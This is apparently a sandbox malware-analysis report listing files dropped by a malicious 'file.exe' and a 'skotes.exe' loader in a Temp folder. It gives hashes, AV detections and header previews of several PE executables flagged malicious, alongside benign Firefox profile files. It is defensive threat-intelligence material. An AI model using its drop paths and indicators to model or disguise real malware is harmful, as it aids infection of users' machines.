                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):1800704
                                                                                                                                                                                                                                                                                                            Entropy (8bit):7.945048254318382
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:24576:ENEpFHR2c8uU5PagNqNMLs7G27xKaPuIPAssGEriSBh/3HGfMgVpbC5Au9ykvDqO:Eqd8FNqNMLs7Jz/xEnh/ANC5V9t7hKI
                                                                                                                                                                                                                                                                                                            MD5:EFBCCEEFF7FBBE424508E4DE00AD3CCD
                                                                                                                                                                                                                                                                                                            SHA1:33574ECF95F1CA351C97FA11C439B7679AE56AC6
                                                                                                                                                                                                                                                                                                            SHA-256:59D0F4B4643AD0497F1D181024953AFF948698A7E749DA8CCE46F1E86642EE08
                                                                                                                                                                                                                                                                                                            SHA-512:154AAD64A9CC25915986190DF630B889FE41207D434831FF606F3212994BCAC8235763D43C1BE4D1BC98F1A712E27F6E06847A38B5C9DDC14780A587B9416E9C
                                                                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 39%
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8..k..k..k.'k..k..k..k.&k..k...k..k...k..k...j..k..k..k.#k..k..k..kRich..k........................PE..L...O./g.....................".......`i...........@...........................i......b....@.................................M.$.a.....$.......................$..................................................................................... . ..$......b..................@....rsrc.........$......r..............@....idata ......$......t..............@... ..*...$......v..............@...swacraub.....pO......x..............@...agtryioj.....Pi......T..............@....taggant.0...`i.."...X..............@...................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):921600
                                                                                                                                                                                                                                                                                                            Entropy (8bit):6.590262984410997
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:12288:VqDEvFo+yo4DdbbMWu/jrQu4M9lBAlKhQcDGB3cuBNGE6iOrpfe4JdaDgaATM:VqDEvCTbMWu7rQYlBQcBiT6rprG8aYM
                                                                                                                                                                                                                                                                                                            MD5:000F6A67464F429EE855358DDADB9F3D
                                                                                                                                                                                                                                                                                                            SHA1:CFC0BE7773E578ABE007BBE5C7106F6770A4685F
                                                                                                                                                                                                                                                                                                            SHA-256:0A80BF68485BE42BACBDADAE87992C162FAC7CCA497B06666BBE34870C9DD025
                                                                                                                                                                                                                                                                                                            SHA-512:F8CA3D938752E626C5551BF4008F20FB3CC5610ACF078BB9A3542E8386636A7B59F14CD6B9E0B020FA508C68DC3CE8E0EFE2C4E99E100DB32946835B298F365A
                                                                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 32%
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L.....?g.........."..........`......w.............@..........................p............@...@.......@.....................d...|....@...........................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc........@......................@..@.reloc...u.......v..................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):2811392
                                                                                                                                                                                                                                                                                                            Entropy (8bit):6.517316515830956
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:24576:/ob3BrCVha0r+wdg2bi+LvmksRG2vhhSVdGfA04QQPQqZK62Kj25HfU6YRyU7ePw:/oFuHbrfLuNv1D3H8/7eeUSh20Ytq5
                                                                                                                                                                                                                                                                                                            MD5:2F1C8416CEF3B59A907932142D732C06
                                                                                                                                                                                                                                                                                                            SHA1:C69BB3BA442619D99229D9651198C390D880C71E
                                                                                                                                                                                                                                                                                                            SHA-256:7B802D3D4EEDCF7E0D2CBD1031A9DA3AB987F7082EDC52C189BAFC902B51B547
                                                                                                                                                                                                                                                                                                            SHA-512:EA5AF9CB4808C6519FC3846244F6F2BE8B613E74ABED074D9A29DA6EE93093CA6615824A042C53B61C137D969B84725081DAE28AA9BA5573129F7F88ADF681FE
                                                                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 42%
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$...........`+.. ...`....@.. ........................+.......*...`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...cpzpcpnh..*.......*..:..............@...ghvclarm. ...@+.......*.............@....taggant.@...`+.."....*.............@...................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):1889792
                                                                                                                                                                                                                                                                                                            Entropy (8bit):7.949390379782367
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:24576:jSW/ofKP26CwSz/h3O2In5iOSCeRWwBuP/xD7LCSWSA2yJNjsu9yk5H0RhbB9XfB:jp/w6CjZO2U5iOSNRbBuhC7LqQHANlB
                                                                                                                                                                                                                                                                                                            MD5:FC60FAC3B512854DF25F9A62A8982B5F
                                                                                                                                                                                                                                                                                                            SHA1:55BDF77F2F4E613F2AAF0A3CC22FC2E68678AC7E
                                                                                                                                                                                                                                                                                                            SHA-256:1BF9D23D442E10A752D5FF0BAC0FC06A679FE36F8C289EA9243F5C6D94BED687
                                                                                                                                                                                                                                                                                                            SHA-512:0603EF0B95CD18343686ABF01D0DD7FD7F55693BDCC308FD50D9A66DE65F6C25C3401B21FC73AA91A7E50E3217FE127071FAA836425EB0B650621422CE26389B
                                                                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................J...........@...........................K...........@.................................W...k.......H.....................J.............................<.J..................................................... . ............................@....rsrc...H...........................@....idata ............................@... .`*.........................@...zbdrpywl......1.....................@...dwhjapcc......J.....................@....taggant.0....J.."..................@...................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                                                                                                            Size (bytes):26
                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                            File Type:ISO Media, MP4 Base Media v1 [ISO 14496-12:2003]
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):32768
                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.4593089050301797
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:48:9SP0nUgwyZXYI65yFRX2D3GNTTfyn0Mk1iA:9SDKaIjo3UzyE1L
                                                                                                                                                                                                                                                                                                            MD5:D910AD167F0217587501FDCDB33CC544
                                                                                                                                                                                                                                                                                                            SHA1:2F57441CEFDC781011B53C1C5D29AC54835AFC1D
                                                                                                                                                                                                                                                                                                            SHA-256:E3699D9404A3FFC1AFF0CA8A3972DC0EF38BDAB927741E9F627C7C55CEA42E81
                                                                                                                                                                                                                                                                                                            SHA-512:F1871BF28FF25EE52BDB99C7A80AB715C7CAC164DCD2FD87E681168EE927FD2C5E80E03C91BB638D955A4627213BF575FF4D9EECAEDA7718C128CF2CE8F7CB3D
                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:... ftypisom....isomiso2avc1mp41....free....mdat..........E...H..,. .#..x264 - core 152 r2851 ba24899 - H.264/MPEG-4 AVC codec - Copyleft 2003-2017 - http://www.videolan.org/x264.html - options: cabac=1 ref=3 deblock=1:0:0 analyse=0x3:0x113 me=hex subme=7 psy=1 psy_rd=1.00:0.00 mixed_ref=1 me_range=16 chroma_me=1 trellis=1 8x8dct=1 cqm=0 deadzone=21,11 fast_pskip=1 chroma_qp_offset=-2 threads=4 lookahead_threads=1 sliced_threads=0 nr=0 decimate=1 interlaced=0 bluray_compat=0 constrained_intra=0 bframes=3 b_pyramid=2 b_adapt=1 b_bias=0 direct=1 weightb=1 open_gop=0 weightp=2 keyint=250 keyint_min=25 scenecut=40 intra_refresh=0 rc_lookahead=40 rc=crf mbtree=1 crf=23.0 qcomp=0.60 qpmin=0 qpmax=69 qpstep=4 ip_ratio=1.40 aq=1:1.00......e...+...s|.kG3...'.u.."...,J.w.~.d\..(K....!.+..;....h....(.T.*...M......0..~L..8..B..A.y..R..,.zBP.';j.@.].w..........c......C=.'f....gI.$^.......m5V.L...{U..%V[....8......B..i..^,....:...,..5.m.%dA....moov...lmvhd...................(...........
                                                                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exe
                                                                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):314617856
                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.00234057762599113
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:768:lWE9OaBxc0AJF8JAfPrYU3HcW534/lVBilJ7xbAOxuz/kQ:/xBxcEJAfPrYSHcW6/CdBuz7
                                                                                                                                                                                                                                                                                                            MD5:9D00DF14EED4230877C1EF0A679A8E70
                                                                                                                                                                                                                                                                                                            SHA1:F874289FCC1BA995D94FF43D115826B18232FAE1
                                                                                                                                                                                                                                                                                                            SHA-256:05466AC3A1F09726E552D0CBF3BAC625A7EB7944CEDF812F60B066DCBD74AFB1
                                                                                                                                                                                                                                                                                                            SHA-512:017F4987A0C9BCA49A299C6C3DC940AE3C0C2FD4B7DD78D03C3B65AD0B766231D68DC9F8CDE5A9F20186DDF1B642918361D44473D4B313B2E62D00648AD57D36
                                                                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 46%
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v.<g...............(.v........................@.......................... ...........@... .................................................................d...........................D.......................T................................text....t.......v..................`..`.data...T............z..............@....rdata...............|..............@..@.eh_fram............................@..@.bss....t................................idata..............................@....CRT....0...........................@....tls................................@....reloc..d...........................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):453023
                                                                                                                                                                                                                                                                                                            Entropy (8bit):7.997718157581587
                                                                                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                                                                            MD5:85430BAED3398695717B0263807CF97C
                                                                                                                                                                                                                                                                                                            SHA1:FFFBEE923CEA216F50FCE5D54219A188A5100F41
                                                                                                                                                                                                                                                                                                            SHA-256:A9F4281F82B3579581C389E8583DC9F477C7FD0E20C9DFC91A2E611E21E3407E
                                                                                                                                                                                                                                                                                                            SHA-512:06511F1F6C6D44D076B3C593528C26A602348D9C41689DBF5FF716B671C3CA5756B12CB2E5869F836DEDCE27B1A5CFE79B93C707FD01F8E84B620923BB61B5F1
                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:PK.........bN...R..........gmpopenh264.dll..|.E.0.=..I.....1....4f1q.`.........q.....'+....h*m{.z..o_.{w........$..($A!...|L...B&A2.s.{..Dd......c.U.U..9u.S...K.l`...../.d.-....|.....&....9......wn..x......i.#O.+.Y.l......+....,3.3f..\..c.SSS,............N...GG...F.'.&.:'.K.Z&.>.@.g..M...M.`...*.........ZR....^jg.G.Kb.o~va.....<Z..1.#.O.e.....D..X..i..$imBW..Q&.......P.....,M.,..:.c...-...\......*.....-i.K.I..4.a..6..*...Ov=...W..F.CH.>...a.'.x...#@f...d..u.1....OV.1o}....g.5.._.3.J.Hi.Z.ipM....b.Z....%.G..F................/..3.q..J.....o...%.g.N.*.}..).3.N%.!..q*........^I.m..~...6.#.~+.....A...I]r...x..*.<IYj....p0..`S.M@.E..f.=.;!.@.....E..E....... .0.n....Jd..d......uM.-.qI.lR..z..=}..r.D.XLZ....x.$..|c.1.cUkM.&.Qn]..a]t.h..*.!.6 7..Jd.DvKJ"Wgd*%n...w...Jni.inmr.@M.$'Z.s....#)%..Rs..:.h....R....\..t.6..'.g.........Uj+F.cr:|..!..K.W.Y...17......,....r.....>.N..3.R.Y.._\...Ir.DNJdM... .k...&V-....z.%...-...D..i..&...6....7.2T).>..0..%.&.
                                                                                                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):3621
                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.928611136590967
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                                                                            MD5:D56C093D8DDFC83EDBC4183AD2C6EBF0
                                                                                                                                                                                                                                                                                                            SHA1:0C7EDE52EC4E2373CEF309CB92CA4D166767D6EA
                                                                                                                                                                                                                                                                                                            SHA-256:1E4C5D0A5A6E0F9EF0EF16FB66AAC89B62E5A831414D55114B963CA099C53942
                                                                                                                                                                                                                                                                                                            SHA-512:0FB89A04A3F0CFAB4B34F40486233B5D3B4E28FA750411017099A7A6C0B56362CF78AF937FB2EB2EF634B3ED376265A4C9AA2D5D160C62D0895B8043DFEAE0CC
                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:{"csv-import-release-rollout":{"slug":"csv-import-release-rollout","branch":{"slug":"enable-csv-import","ratio":1,"feature":{"value":{},"enabled":false,"featureId":"this-is-included-for-desktop-pre-95-support"},"features":[{"value":{"csvImport":true},"enabled":true,"featureId":"cm-csv-import"}]},"active":true,"enrollmentId":"c5d95379-f4ee-4629-a507-6f15a0e93cd4","experimentType":"rollout","source":"rs-loader","userFacingName":"CSV Import (Release Rollout)","userFacingDescription":"This rollout enables users to import logins from a CSV file from the about:logins page.","lastSeen":"2023-10-03T11:50:29.548Z","featureIds":["cm-csv-import"],"prefs":[{"name":"signon.management.page.fileImport.enabled","branch":"default","featureId":"cm-csv-import","variable":"csvImport","originalValue":false}],"isRollout":true},"serp-ad-telemetry-rollout":{"slug":"serp-ad-telemetry-rollout","branch":{"slug":"control","ratio":1,"feature":{"value":{},"enabled":false,"featureId":"this-is-included-for-desktop-pr
                                                                                                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):3621
                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.928611136590967
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                                                                            MD5:D56C093D8DDFC83EDBC4183AD2C6EBF0
                                                                                                                                                                                                                                                                                                            SHA1:0C7EDE52EC4E2373CEF309CB92CA4D166767D6EA
                                                                                                                                                                                                                                                                                                            SHA-256:1E4C5D0A5A6E0F9EF0EF16FB66AAC89B62E5A831414D55114B963CA099C53942
                                                                                                                                                                                                                                                                                                            SHA-512:0FB89A04A3F0CFAB4B34F40486233B5D3B4E28FA750411017099A7A6C0B56362CF78AF937FB2EB2EF634B3ED376265A4C9AA2D5D160C62D0895B8043DFEAE0CC
                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:{"csv-import-release-rollout":{"slug":"csv-import-release-rollout","branch":{"slug":"enable-csv-import","ratio":1,"feature":{"value":{},"enabled":false,"featureId":"this-is-included-for-desktop-pre-95-support"},"features":[{"value":{"csvImport":true},"enabled":true,"featureId":"cm-csv-import"}]},"active":true,"enrollmentId":"c5d95379-f4ee-4629-a507-6f15a0e93cd4","experimentType":"rollout","source":"rs-loader","userFacingName":"CSV Import (Release Rollout)","userFacingDescription":"This rollout enables users to import logins from a CSV file from the about:logins page.","lastSeen":"2023-10-03T11:50:29.548Z","featureIds":["cm-csv-import"],"prefs":[{"name":"signon.management.page.fileImport.enabled","branch":"default","featureId":"cm-csv-import","variable":"csvImport","originalValue":false}],"isRollout":true},"serp-ad-telemetry-rollout":{"slug":"serp-ad-telemetry-rollout","branch":{"slug":"control","ratio":1,"feature":{"value":{},"enabled":false,"featureId":"this-is-included-for-desktop-pr
                                                                                                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                            File Type:Mozilla lz4 compressed data, originally 23432 bytes
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):5312
                                                                                                                                                                                                                                                                                                            Entropy (8bit):6.615424734763731
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                                                                            MD5:1B9C8056D3619CE5A8C59B0C09873F17
                                                                                                                                                                                                                                                                                                            SHA1:1015C630E1937AA63F6AB31743782ECB5D78CCD8
                                                                                                                                                                                                                                                                                                            SHA-256:A6AE5DE0733FED050AB570AD9374FF4593D554F695B5AE4E2495871D171D34A3
                                                                                                                                                                                                                                                                                                            SHA-512:B1DC9CC675D5476C270A2D5B214D3DF2B3856576ED7EFE92D9A606C2D9D34E781018902AE75CE9C1E25007BB7F8D8F7B52997E6F05B845EF44BAF22F614FE899
                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:mozLz40..[....{"app-system-defaults":{"addon....formautofill@mozilla.org&..Gdependencies":[],"enabled":true,"lastModifiedTime":1695865283000,"loader":null,"path":s.....xpi","recommendationStateA...rootURI":"jar:file:///C:/Program%20Files/M.......refox/browser/features/...... !/...unInSafeMode..wsignedD...telemetryKey..7%40R...:1.0.1","version":"..`},"pic..#in.....T.n..w...........S.......(.[......0....0"},"screenshots..T.r.....[.......(.V....-39.......},"webcompat-reporter...Ofals..&.z.....[.......(.]....=1.5.............<.)....p....d......1.z.!18...5.....startupData...pX.astentL..!er...webRequest%..onBefore...[[{"incognitoi.UtabId..!yp...."main_frame"],"url...."*://login.microsoftonline.com/*","..@us/*L.dwindows...},["blocking"]],...Iimag...https://smartT.".f.....etp/facebook.svg",...Aplay*....8`script...P.....-....-testbed.herokuapp\.`shims_..3.jsh.bexampl|.......Pexten{..Q../?..s...S.J/_2..@&_3U..s7.addthis . ic...officialK......-angularjs/current/dist(..t.min.js...track.adB...net/s
                                                                                                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                            File Type:Mozilla lz4 compressed data, originally 23432 bytes
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):5312
                                                                                                                                                                                                                                                                                                            Entropy (8bit):6.615424734763731
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                                                                            MD5:1B9C8056D3619CE5A8C59B0C09873F17
                                                                                                                                                                                                                                                                                                            SHA1:1015C630E1937AA63F6AB31743782ECB5D78CCD8
                                                                                                                                                                                                                                                                                                            SHA-256:A6AE5DE0733FED050AB570AD9374FF4593D554F695B5AE4E2495871D171D34A3
                                                                                                                                                                                                                                                                                                            SHA-512:B1DC9CC675D5476C270A2D5B214D3DF2B3856576ED7EFE92D9A606C2D9D34E781018902AE75CE9C1E25007BB7F8D8F7B52997E6F05B845EF44BAF22F614FE899
                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:mozLz40..[....{"app-system-defaults":{"addon....formautofill@mozilla.org&..Gdependencies":[],"enabled":true,"lastModifiedTime":1695865283000,"loader":null,"path":s.....xpi","recommendationStateA...rootURI":"jar:file:///C:/Program%20Files/M.......refox/browser/features/...... !/...unInSafeMode..wsignedD...telemetryKey..7%40R...:1.0.1","version":"..`},"pic..#in.....T.n..w...........S.......(.[......0....0"},"screenshots..T.r.....[.......(.V....-39.......},"webcompat-reporter...Ofals..&.z.....[.......(.]....=1.5.............<.)....p....d......1.z.!18...5.....startupData...pX.astentL..!er...webRequest%..onBefore...[[{"incognitoi.UtabId..!yp...."main_frame"],"url...."*://login.microsoftonline.com/*","..@us/*L.dwindows...},["blocking"]],...Iimag...https://smartT.".f.....etp/facebook.svg",...Aplay*....8`script...P.....-....-testbed.herokuapp\.`shims_..3.jsh.bexampl|.......Pexten{..Q../?..s...S.J/_2..@&_3U..s7.addthis . ic...officialK......-angularjs/current/dist(..t.min.js...track.adB...net/s
                                                                                                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):24
                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.91829583405449
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                                                                            MD5:3088F0272D29FAA42ED452C5E8120B08
                                                                                                                                                                                                                                                                                                            SHA1:C72AA542EF60AFA3DF5DFE1F9FCC06C0B135BE23
                                                                                                                                                                                                                                                                                                            SHA-256:D587CEC944023447DC91BC5F71E2291711BA5ADD337464837909A26F34BC5A06
                                                                                                                                                                                                                                                                                                            SHA-512:B662414EDD6DEF8589304904263584847586ECCA0B0E6296FB3ADB2192D92FB48697C99BD27C4375D192150E3F99102702AF2391117FFF50A9763C74C193D798
                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:{"schema":6,"addons":[]}
                                                                                                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):24
                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.91829583405449
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                                                                            MD5:3088F0272D29FAA42ED452C5E8120B08
                                                                                                                                                                                                                                                                                                            SHA1:C72AA542EF60AFA3DF5DFE1F9FCC06C0B135BE23
                                                                                                                                                                                                                                                                                                            SHA-256:D587CEC944023447DC91BC5F71E2291711BA5ADD337464837909A26F34BC5A06
                                                                                                                                                                                                                                                                                                            SHA-512:B662414EDD6DEF8589304904263584847586ECCA0B0E6296FB3ADB2192D92FB48697C99BD27C4375D192150E3F99102702AF2391117FFF50A9763C74C193D798
                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:{"schema":6,"addons":[]}
                                                                                                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                            File Type:Windows WIN.INI
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):200
                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.391255133360986
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                                                                            MD5:3FB561547A46AF02D6B00F86DC370634
                                                                                                                                                                                                                                                                                                            SHA1:914867E4C763611B441835A3FC0082359FBF7277
                                                                                                                                                                                                                                                                                                            SHA-256:5393F0E8D90EE6A26EAC13B81B83EDC0637487B3E427175021D7EC4CDE8E34A7
                                                                                                                                                                                                                                                                                                            SHA-512:0E05486A6B6AD65D3A95FCFE46BE6687DD47E311374F11DE89F9CFB8C301951D6BFE43FA24851A3E759B6F8AF69A5F593568FB61F576AB52941F6B2B6EE54BC8
                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:[Compatibility]..LastVersion=118.0.1_20230927232528/20230927232528..LastOSABI=WINNT_x86_64-msvc..LastPlatformDir=C:\Program Files\Mozilla Firefox..LastAppDir=C:\Program Files\Mozilla Firefox\browser..
                                                                                                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                            File Type:Mozilla lz4 compressed data, originally 56 bytes
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):66
                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.837595020998689
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                                                                            MD5:A6338865EB252D0EF8FCF11FA9AF3F0D
                                                                                                                                                                                                                                                                                                            SHA1:CECDD4C4DCAE10C2FFC8EB938121B6231DE48CD3
                                                                                                                                                                                                                                                                                                            SHA-256:078648C042B9B08483CE246B7F01371072541A2E90D1BEB0C8009A6118CBD965
                                                                                                                                                                                                                                                                                                            SHA-512:D950227AC83F4E8246D73F9F35C19E88CE65D0CA5F1EF8CCBB02ED6EFC66B1B7E683E2BA0200279D7CA4B49831FD8C3CEB0584265B10ACCFF2611EC1CA8C0C6C
                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:mozLz40.8.....{"v":1,"crashes":{},"countsByDay....rruptDate":null}
                                                                                                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
